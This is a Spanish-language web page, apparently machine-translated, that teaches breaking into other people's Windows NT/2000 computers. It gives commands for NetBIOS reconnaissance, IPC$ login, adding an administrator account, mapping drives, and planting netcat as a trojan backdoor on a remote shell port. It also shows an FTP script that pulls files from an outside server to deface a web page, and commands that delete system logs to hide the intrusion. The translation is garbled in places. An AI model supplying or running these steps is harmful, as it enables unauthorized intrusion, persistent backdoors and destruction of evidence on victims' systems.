Red de conocimiento informático - Conocimiento del nombre de dominio - Cómo ingresar a los sistemas operativos de otras personas en línea.

Cómo ingresar a los sistemas operativos de otras personas en línea.

Cómo ingresar a las computadoras de otras personas - -

Cuando estaba en la universidad, tomé el curso de programación de computadoras de ACCP. Era solo un pasatiempo que no estudiaba mucho. Más interesado en algunas cosas complicadas, lo que más hice en ese momento fue intentar ingresar a las computadoras y servidores de otras personas...

1. Obtener la dirección IP de la otra parte, como XX.XX.XX. .XX. Hay demasiados métodos que no están detallados.

2. Determine la ubicación de acceso a Internet de la otra parte, abra una ventana de DOS y escriba TRACERT XX.XX.XX.XX. La información reflejada en las líneas 4 y 5 es la ubicación de acceso a Internet de la otra parte.

3. Obtenga el nombre de la computadora de la otra parte, abra una ventana de DOS y escriba NBTSTAT -A XX.XX.XX.XX La primera línea es el nombre de la computadora de la otra parte, la segunda línea es el grupo de trabajo donde se encuentra la computadora de la otra parte, y la tercera línea es Instrucciones para la computadora de la otra parte

4. Hay un archivo llamado LMHOSTS.SAM en el directorio de Windows. Cámbiele el nombre a LMHOSTS y elimínelo. contenido y escriba la IP de la otra parte y el nombre de la computadora en el archivo en el siguiente formato: XX .XX.XX.XX nombre de la computadora

5. Abra la ventana de DOS y escriba NBTSTAT -R 6. Ingrese el nombre de la computadora de la otra parte en Start-Search-Computer, haga clic en la computadora de la otra parte para ingresar

Hacker Command 1: NET

Siempre que tenga el nombre de usuario y la contraseña de un determinado IP, ¡usa IPC$ para conectarte!

Aquí asumimos que el usuario que obtiene es hbx y la contraseña es 123456. Supongamos que la IP de la otra parte es

127.0.0.1

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

Salir del comando Sí

net use \\127.0.0.1\ipc$ /delte

Debe iniciar sesión antes de poder utilizar las siguientes operaciones. El método de inicio de sesión se encuentra arriba. >

----------------------

A continuación hablaremos de cómo crear un usuario, porque la autoridad de SA es equivalente al superusuario del sistema

Cuenta

Agreguemos un usuario heibai cuya contraseña es lovechina

usuario neto heibai lovechina /add

Siempre que el comando se muestre correctamente, podremos agregarlo al grupo de administradores

net localgroup Administrators heibai /add

-------. ------------------- --

Aquí estamos hablando de mapear la unidad C de la otra parte. Por supuesto, también se pueden usar otras unidades. Mientras existan, aquí

asignamos la unidad C de la otra parte a la unidad Z local

net use z:\\127.0.0.1\c$

.

-----------------------

net start telnet

Esto puede abrir el TELNET de la otra parte service.

------------------- ---

Aquí está la activación del usuario invitado. El invitado es el usuario predeterminado. de NT y no se puede eliminar?

No sé si este es el caso, pero mi 2000 simplemente no puede eliminarlo.

usuario neto invitado /activo: sí

-----------------------

Aquí cambiamos la contraseña de un usuario Cambiamos la contraseña de invitado a lovechina

Otros usuarios también pueden hacerlo.

¡Siempre y cuando tengas permiso!

usuario de red invitado lovechina

Comando hacker 2: en

Generalmente, un intruso dejará una puerta trasera después de la intrusión, que consiste en colocar un caballo de Troya. Se ha subido un troyano, ¿cómo activarlo?

Entonces necesitas usar el comando AT. Se supone que has iniciado sesión en ese servidor.

Primero debe obtener la hora de la otra parte.

hora neta \\127.0.0.1

devolverá una hora, asumiendo que la hora es 12:1. , Ahora necesitamos crear un nuevo trabajo con ID=1

en \\127.0.0.1 12:3 nc.exe

Aquí asumimos que hay un troyano llamado NC.EXE. debe estar en el servidor de la otra parte.

Aquí hay una introducción a NC. NC es la abreviatura de NETCAT. Para facilitar la entrada, generalmente se le cambia el nombre. Servicio TELNET con puerto 99.

Espere hasta las 12:3 para conectarse al puerto 99 de la otra parte. Esto instalará un caballo de Troya para la otra parte.

Comando hacker 3: telnet.

Este comando es muy práctico. Puede conectarse a una ubicación remota, pero normalmente requiere una contraseña y un usuario. Sin embargo, usted instaló un troyano para la otra parte y se conectó directamente al puerto abierto por el troyano.

telnet 127.0.0.1 99

De esta manera, puede conectarse al puerto 99 de la otra parte. Luego puede ejecutar comandos en la otra parte, que también es

un asador.

Hacker Command 4: FTP

Puede transferir sus cosas a la máquina de la otra parte. Puede solicitar un espacio que admita la carga FTP. p>

Hay muchos en China. Sí, si realmente no puedes encontrarlo, te daré un truco (el nombre de usuario que usaste cuando presentaste la solicitud)

prueba (la contraseña que usaste). utilizado cuando presentó la solicitud)

obtenga index.htm c:\ inetpub\wwwroot\index.htm (aquí puede descargar el index.htm en su espacio

al c de la otra parte :\inetpub\wwwroot\index.htm)

adiós (salga del diálogo FTP, equivalente a DOS en 98, use EXIT para salir de DOS)

Métodos específicos:

Ingrese echo open upload.chinaren.com> c:\cnhack.txt

p>

Ingrese echo cnhack >> c:\cnhack.txt

Ingrese echo 39abs >> c:\cnhack.txt

Ingrese echo get index.htm

c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt

Finalmente ingrese ftp -s:c:\cnhack.txt (usando el parámetro -s de ftp, ejecute el contenido

en el archivo. )

Cuando se completa el comando, el archivo se habrá descargado en el archivo que usted especificó.

Nota: Después de obtener el archivo, elimine cnhack.txt. (Si no la elimina, es fácil que

otros vean su contraseña).

Recuerde eliminar c:\cnhack.txt

Hacker Comando 11:attrib

Este comando establece los atributos del archivo. Si desea piratear un sitio web y el atributo de archivo

de su página de inicio está configurado como de solo lectura, será muy lamentable. No podrá eliminarlo incluso si desea sobrescribirlo

Está bien.

¡caer! Pero no temas si tienes este pedido.

attrib -r index.htm

Este comando elimina el atributo de solo lectura de index.htm.

Si cambia "-" a "+", establecerá el atributo de este archivo en solo lectura-------------------- --

attrib +r index.htm

Este comando establece las propiedades de index.htm en solo lectura.

Hacker Command 12:del

¡No te caigas cuando veas este título! Ahora tenemos que salir de 127.0.0.1 y eliminar el registro. ¡Por supuesto que tenemos que eliminar el registro! ¿Quieres que te atrapen? jeje.

Los registros de NT incluyen estos

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\* . evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\ winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

Simplemente elimine estos Eso es él. Algunos sistemas NT se instalan en la unidad D u otras unidades, por lo que es necesario cambiar C

a otra unidad.